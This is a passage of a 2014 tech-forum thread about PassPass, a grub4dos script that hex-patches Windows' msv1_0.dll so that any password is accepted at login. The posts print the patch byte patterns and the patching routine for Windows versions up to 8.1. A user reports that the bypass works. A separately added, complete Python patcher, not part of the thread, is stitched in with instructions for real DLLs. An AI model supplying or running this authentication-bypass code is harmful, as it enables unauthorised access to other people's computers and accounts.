PassPass - Bypass the Password


383 replies to this topic

#251 steve6375

steve6375

    Platinum Member

  • Developer
  • 6828 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films,guitars, www.easy2boot.com
  •  
    United Kingdom

Posted 02 September 2014 - 04:58 PM

or PIN entry or picture entry generates a 'pseudo-password' which is then checked by the dll??? The code that is patched compares two strings.



#252 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 02 September 2014 - 04:58 PM

It means 'msv1_0.dll' is the file which holds all types of log-in password entries (password entry, PIN entry and picture entry)?

It doesn't contain passwords, but the password check routine MsvpPasswordValidate()

 

The script tries to locate all existing Windows installations and corresponding Windows editions as well. Thereafter, it replaces the CMP instruction responsible for password verification with a 'benign' sequence of bytes. For reverting back the changes, the process is just the opposite. The whole idea is derived from WindowsGate and Astr0baby's tutorial.



#253 steve6375

Posted 02 September 2014 - 06:58 PM

E2B version 1.5 (bug fix in menu - did not return to Main menu if no Windows files found)

 




#254 knjor

knjor
  • Members
  • 8 posts
  •  
    Egypt

Posted 09 September 2014 - 08:16 PM

E2B version 1.5 (bug fix in menu - did not return to Main menu if no Windows files found)

hi steve

 

Is this the latest update for Windows 8.1?



#255 steve6375

Posted 09 September 2014 - 08:41 PM

Yes - I think it all works...



#256 boulcat

boulcat

    Member

  • Advanced user
  • 51 posts
  •  
    Belgium

Posted 12 September 2014 - 09:40 AM

Just discovered this, I'll try it as soon as possible in a VM :)
To save time, what is the risk of using it without a backup on a real computer?
Grub4dos: how to make PassPass work with UEFI?
Based on it, is there a possibility to patch msv1_0.dll with a program in a WinPE?


#257 steve6375

Posted 12 September 2014 - 09:55 AM

You can try on a real computer, just make a backup of the dll first.

It can also mess up other account passwords when you log in again after restoring the dll, and you may have to enter passwords etc. again for some accounts, e.g. Dropbox, etc., which is a bit of a nuisance.

 

UEFI is not supported as grub4dos only boots in MBR mode. You could try booting in MBR mode, modify the DLL and then reboot from the internal HDD in UEFI mode. I am not sure if grub4dos works with GPT partitions though...



#258 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14520 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 September 2014 - 10:36 AM

 

Based on it, is there a possibility to patch msv1_0.dll with a program in a WinPE ?

 

Sure, it is just a hex patch, you can do it also from DOS (if you have a NTFS DOS driver, if the target is NTFS), or from Linux for that matter.

The use of grub4dos is just a (small, compact, effective) choice.

 

 

 I am not sure if grub4dos works with GPT partitions though...

Sure it does (latest versions, at least).

 

:duff:

Wonko



#259 boulcat

Posted 12 September 2014 - 01:32 PM

UEFI is not supported as grub4dos only boots in MBR mode. You could try booting in MBR mode - modify the the DLL and then reboot from the internal HDD in UEFI mode.

 

You mean by disabling Secure Boot and using the CSM.
About the backup of the dll first (.bak), if it is safer, is it possible to add it to PassPass.g4b?
 

Sure, it is just a hex patch, you can do it also from DOS (if you have a NTFS dos driver if th etarget is NTFS), or from a Linux for that matters.

 

I do not know how to do it with DOS. I am thinking of gsar or AutoIt.
May I ask, if you can share (PM :unsure:), since you have spent time on it ;): the MD5 or other hashes of the DLLs to check the version (XP->8.1, x86/x64), with the hex codes to change and the offsets. I can maybe try next week with my notions of AutoIt.
 
:)


#260 Wonko the Sane

Posted 12 September 2014 - 02:21 PM

The PassPass is scripted in grub4dos batch, which is like 99% similar to common Dos/Windows batch.
i.e. it is more or less "plain English".
With all due respect :), if you cannot read a batch script, you cannot write a script in Autoit.
Additionally the script is clearly commented.
 
The script does essentially two things:
  • detects the version of .dll in the system that one wants to patch
  • patches the .dll with the correct pattern (which may depend on the specific .dll version detected)
Once the version has been established, it is - as said -  a simple hex patch, gsar might do:
Snippet from PassPass v1.1 (the one that Holmes.Sherlock failed to update with the new findings):
:32BitPatch
set patt=\x83\xF8\x10
set rpatt=\x33\xC0\x90
if "%majmin%"=="6.2" set patt=\x3B\xC6\x75\x13 && set rpatt=\x33\xC0\x75\x13
goto :DoPatch

:64BitPatch
set patt=\x48\x3B\xC6\x0F\x85
set rpatt=\x33\xC0\x90\x0F\x85
if "%majmin%"=="6.2" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85

:DoPatch
:: Check whether we can unpatch
cat --locate=%rpatt% --number=1 %dllPath% > nul
if "%@retval%"=="1" goto :warnUserP
cat --hex --locate=%patt% --replace=%rpatt% %dllPath% > nul
if "%@retval%"=="0" goto :warnUserP
echo DLL at %dllPath% patched
goto :EOF
Snippet from Steve6375's latest version (in which the script is modified to work with the Easy2boot setup, and with added needless warnings, but the "essential part" doesn't change):
:32BitPatch
set patt=\x83\xF8\x10
set rpatt=\x33\xC0\x90
if "%majmin%"=="6.2" set patt=\x3b\xc6\x75\x13 && set rpatt=\x33\xc0\x75\x13
if "%majmin%"=="6.3" set patt=\x4d\x3b\xc6\x0F\x85 && set rpatt=\x4d\x33\xc0\x0F\x85
echo 32-Bit Win%majmin% - Patch bytes %patt% with %rpatt%

:DoPatch
:: check we can unpatch
cat --locate=%rpatt% %dllPath% > nul
if not "%@retval%"=="0" goto :warnUser

cat --locate=%patt% %dllPath% > %tmpmem%
set n1=%@retval%
if %n1%==0 goto :warnUser
set ask=
if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %file%! Press S to skip : 
if not "%ask%"=="S" cat --hex --locate=%patt% --replace=%rpatt% %dllPath% > nul 
set r=%@retval%
if "%ask%"=="S" echo -e \n\n User aborted - press a key... && goto :EOF
if "%n1%"=="0" goto :warnUser
goto :patchMessage

:64BitPatch
set patt=\x48\x3B\xC6\x0F\x85
set rpatt=\x33\xC0\x90\x0F\x85

if "%majmin%"=="6.2" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85
if "%majmin%"=="6.3" set patt=\x49\x3B\xC6\x0F\x85 && set rpatt=\x33\xC0\x90\x0F\x85
echo 64-Bit Win%majmin% - Patch bytes %patt% with %rpatt%
goto :DoPatch

But the whole point (if you want the only "elegant" part in the approach) is that by having this internal to grub4dos you:
  • boot to grub4dos
  • patch the file
  • continue booting to the "resident" patched Windows install
as opposed to:
  • boot *some other* OS
  • patch the file
  • reboot, booting this time to the "resident" patched Windows install
The (as usual half-@§§ed ;) but seemingly effective) .dll version detection method is also - by itself - posted here:
http://reboot.pro/to...nd-dll-version/
though a "highish level" scripting language like AutoIT running in a PE has most probably a better built-in method/command/whatever for this.
 
:duff:
Wonko
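
The hex-patch logic of the grub4dos snippets above, and the CMP replacement described in post #252, carried over into a stand-alone Python script as an added example; this is not the PassPass script nor any code posted in the thread. It keeps the script's three safety checks (replacement bytes already present, search bytes absent, more than one hit) and supplies the two inputs the script derives elsewhere: bitness from the PE header's Machine field, and the "majmin" key from the DLL's FileVersion string. Assumptions not taken from the thread: the version string is located by a plain UTF-16 search for the FileVersion entry rather than a full resource-directory walk, and the images produced by `build_sample()` are constructed stand-ins for msv1_0.dll, not the real file.

```python
"""Offline equivalent of the PassPass hex patch (added example, not the PassPass script)."""
import struct

# Find/replace byte pairs as they appear in the grub4dos script (always the same length).
# Versions other than 6.2/6.3 fall back to "default", exactly as the script does.
PATTERNS = {
    "x86": {
        "default": (b"\x83\xF8\x10", b"\x33\xC0\x90"),                  # cmp eax,10h -> xor eax,eax ; nop
        "6.2": (b"\x3B\xC6\x75\x13", b"\x33\xC0\x75\x13"),              # cmp eax,esi ; jne -> xor eax,eax ; jne
        "6.3": (b"\x4D\x3B\xC6\x0F\x85", b"\x4D\x33\xC0\x0F\x85"),      # dec ebp ; cmp eax,esi ; jnz -> dec ebp ; xor eax,eax ; jnz
    },
    "x64": {
        "default": (b"\x48\x3B\xC6\x0F\x85", b"\x33\xC0\x90\x0F\x85"),  # cmp rax,rsi ; jnz -> xor eax,eax ; nop ; jnz
        "6.2": (b"\x49\x3B\xC6\x0F\x85", b"\x33\xC0\x90\x0F\x85"),      # cmp rax,r14 ; jnz -> xor eax,eax ; nop ; jnz
        "6.3": (b"\x49\x3B\xC6\x0F\x85", b"\x33\xC0\x90\x0F\x85"),
    },
}
IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64 = 0x014C, 0x8664
FILEVERSION_KEY = "FileVersion\0".encode("utf-16-le")   # szKey of the VS_VERSIONINFO String entry


def pe_bitness(data):
    """'x86' or 'x64' from the COFF Machine field; raises on anything that is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}[machine]


def file_version(data):
    """FileVersion string, e.g. '6.3.9600.17415', by a plain search for the UTF-16 key.
    Assumption: the value follows the key after padding to a 4-byte boundary (no full
    resource-directory walk), which holds for the constructed samples below."""
    pos = data.find(FILEVERSION_KEY)
    if pos < 0:
        raise ValueError("FileVersion entry not found")
    start = end = (pos + len(FILEVERSION_KEY) + 3) & ~3
    while data[end:end + 2] != b"\0\0":          # one UTF-16 code unit at a time up to the terminator
        end += 2
        if end >= len(data):
            raise ValueError("unterminated FileVersion value")
    return data[start:end].decode("utf-16-le")


def majmin(version):
    """'6.3.9600.17415' -> '6.3', the key the grub4dos script switches on."""
    return ".".join(version.split(".")[:2])


def patch_image(data, reverse=False, allow_multiple=False):
    """Patch (or with reverse=True unpatch) an msv1_0.dll image held in memory.

    Mirrors the script's checks: refuse if the bytes we would write are already there
    (already patched, or already clean when reversing), refuse if the search bytes are
    absent, and refuse several hits unless the caller opts in.  Returns (bytes, hits).
    """
    table = PATTERNS[pe_bitness(data)]
    patt, rpatt = table.get(majmin(file_version(data)), table["default"])
    if reverse:
        patt, rpatt = rpatt, patt
    assert len(patt) == len(rpatt)               # in-place patch: the file size never changes
    if rpatt in data:
        raise RuntimeError("already " + ("clean" if reverse else "patched"))
    hits = data.count(patt)
    if hits == 0:
        raise RuntimeError("search bytes not found: unknown build or wrong table entry")
    if hits > 1 and not allow_multiple:
        raise RuntimeError("%d instances found; refusing without allow_multiple" % hits)
    return data.replace(patt, rpatt), hits


def build_sample(bitness, version, code):
    """Constructed stand-in for msv1_0.dll (not the real file): MZ stub, PE signature and
    Machine field, a minimal FileVersion entry, then the given code bytes."""
    machine = IMAGE_FILE_MACHINE_I386 if bitness == "x86" else IMAGE_FILE_MACHINE_AMD64
    hdr = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18        # rest of the COFF header zeroed
    rsrc = FILEVERSION_KEY
    rsrc += b"\0" * (-(len(hdr) + len(rsrc)) % 4)                     # pad the value to a 4-byte boundary
    rsrc += (version + "\0").encode("utf-16-le")
    return hdr + rsrc + b"\0" * 16 + code + b"\0" * 16


if __name__ == "__main__":
    dll = build_sample("x64", "6.3.9600.17415", b"\x49\x3B\xC6\x0F\x85\x10\x00\x00\x00")
    patched, hits = patch_image(dll)
    restored, _ = patch_image(patched, reverse=True)
    print("patched %d site(s), unpatch restores the original: %s" % (hits, restored == dll))
```

Against a real copy the call is `patch_image(open(path, "rb").read())`, written back only after the original has been kept aside as the thread advises, and `reverse=True` restores it. Because the match is a raw byte search, a hit count other than one is the signal to stop and look at the function in a disassembler rather than to patch every occurrence blindly.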

#261 steve6375

Posted 12 September 2014 - 02:35 PM

 

You mean by disabling Secure Boot and using the CSM.
About the backup of the dll first (.bak), if it is safer, is it possible to add it to PassPass.g4b?

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.



#262 Holmes.Sherlock

Posted 12 September 2014 - 02:39 PM

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

It's there in SH & WTS PassPass, too

 

Snippet from PassPass v1.1 (the one that Holmes.Sherlock failed to update with the new findings)

 

I do have some kind of issue with the word highlighted. Unlike Italian freelancers, Indian student guys have something called 'real-life commitments'.



#263 boulcat

Posted 12 September 2014 - 02:47 PM

The PassPass is scripted in grub4dos batch, which is like 99% similar to common Dos/Windows batch.

 
The batch is certainly enough. Thanks a lot :)
I'll try to test with Grub4dos and with your batch next week. I'll see about AutoIt.

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

Good, I have not tried E2B yet. First, I'll try SH PassPass.

Holmes.Sherlock could say about the dll backup.

 

But the whole point (if you want the only "elegant" part in the approach) is that by having this internal to grub4dos you:

  • boot to grub4dos
  • patch the file
  • continue booting to the "resident" patched Windows install

 

 

Indeed. I'm not familiar with UEFI and I know my WinPE starts, so it is nice to have the batch too.

:)


Edited by boulcat, 12 September 2014 - 03:00 PM.


#264 Wonko the Sane

Posted 12 September 2014 - 03:21 PM

I do have some kinda issue with the word highlighted. Unlike Italian freelance, Indian students guys have something called 'real-life commitments'.

Sure, no one said that you hadn't your perfectly valid reasons to fail to upgrade the PassPass :), and no one said that you should have done it (though you should actually have done it :whistling:), I am perfectly aware of the gargantuan[1] amount of work and time involved in adding 2 (two) lines to a script.

 

:duff:

Wonko 

 

[1]

You know, I've always liked that word... "gargantuan"... so rarely have an opportunity to use it in a sentence.

 

http://www.imdb.com/...?item=qt0335291



#265 boulcat

Posted 12 September 2014 - 03:31 PM

 

 

In the E2B version (not sure about SH PassPass), the option to backup the dll is already in the menu.

 

 
It's there in SH & WTS PassPass, too

 

 

 

I missed your answer, thanks to you 3 :)



#266 Holmes.Sherlock

Posted 12 September 2014 - 04:05 PM

Sure, noone said that you hadn't your perfectly valid reasons to fail to upgrade the PassPass :), and noone said that you should have done it (though you should actually have done it :whistling:), I am perfectly aware of the gargantuan[1] amount of work and time involved in adding 2 (two) lines to a script.

 

I prefer to fight with people who are 'sane' enough to understand real-life calls.

 

PassPass v1.2 with added support for Windows 8.1, both 32-bit and 64 bit (Credit to Steve for the patch supplied) has been published on my blog.

 

This version includes a floppy image for quick testing (to be mounted by ImDisk or other similar tools) for those who want to gain confidence by trying it out on a virtual machine before applying the patch to a live system.



#267 Wonko the Sane

Posted 12 September 2014 - 04:15 PM

PassPass v1.2 with added support for Windows 8.1, both 32-bit and 64 bit (Credit to Steve for the patch supplied) has been published on my blog.

 

Very good. :)

 

And I would say that it was quick :thumbsup: (even if possibly not timely ;))

 

:duff:

Wonko



#268 boulcat

Posted 12 September 2014 - 08:51 PM

I tested PassPass v1.2 with Windows 8.1 x64 in a VM
DLL at (hd0,1)/Windows/System32/msv1_0.dll patched
Reboot, the password is well bypassed
 
DLL at (hd0,1)/Windows/System32/msv1_0.dll unpatched
Reboot, the old password is again required
 
Just a pity that there is no return to Grub4DOS after the message.
 
I added PassPass to my toolbox, great :good:
 
 
A small issue however with the option to backup msv1_0.dll
 
(screenshot: MuspVQH.jpg)


#269 steve6375

Posted 12 September 2014 - 09:48 PM

What version of grub4dos do you have? 



#270 boulcat

Posted 12 September 2014 - 09:58 PM

I use grub4dos-0.4.5c-2013-10-30



#271 steve6375

Posted 12 September 2014 - 09:59 PM

Try 2014-08-17 version 0.4.5c

http://grub4dos.chen...ries/downloads/



#272 boulcat

Posted 12 September 2014 - 10:24 PM

Done, but same issue with 2014-08-17!

I saw in the Readme: Script tested with Grub4DOS v0.4.5c-2013-03-03!

To continue testing if needed, it will be Monday or Tuesday; I'm leaving for the weekend, see you :)



#273 boulcat

Posted 12 September 2014 - 10:50 PM

Another little trick: after patching, nothing happens here in the VM with the option 'Boot from internal HDD'.
Patch, unpatch is great, no rush ;)
 
Edit: If I replace
if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

by

rootnoverify (hd0)
chainloader +1

it's OK. Is the initial command for USB?

 

Edited by boulcat, 12 September 2014 - 11:09 PM.


#274 tinybit

tinybit

    Gold Member

  • Developer
  • 1102 posts
  •  
    China

Posted 13 September 2014 - 03:16 AM



 

Another little trick: after patching, nothing happens here in the VM with the option 'Boot from internal HDD'.
Patch, unpatch is great, no rush ;)
 
Edit: If I replace

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

by

rootnoverify (hd0)
chainloader +1

it's OK. Is the initial command for USB?

 

Generally, the correct usage of  "chainloading a 512-byte boot sector" should be:

 

1.  Set the current root device by "root", "rootnoverify" or "find --set-root" or any other means.

2.  chainloader THE_BOOT_SECTOR

3.  boot

 

or equivalently

 

1.  chainloader THE_BOOT_SECTOR

2.  Set the current root device by "root", "rootnoverify" or "find --set-root" or any other means.

3.  boot

 

Note that the boot command needs to pass the DL register with the drive number of the root drive, just before it transfers control to the boot sector.

 

So the following usage

 

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
chainloader (hd0)+1

 

is wrong, because the root is unknown or undetermined or unexpected.



#275 Holmes.Sherlock

Posted 13 September 2014 - 05:17 AM

if "%?_BOOT:~0,3%"=="(hd" map (hd0) (hd1)
if "%?_BOOT:~0,3%"=="(hd" map (hd1) (hd0)
if "%?_BOOT:~0,3%"=="(hd" map --hook
rootnoverify (hd0)
chainloader (hd0)+1

Is it correct?

 

BTW, in my VM simulation, earlier piece of code works fine, too.





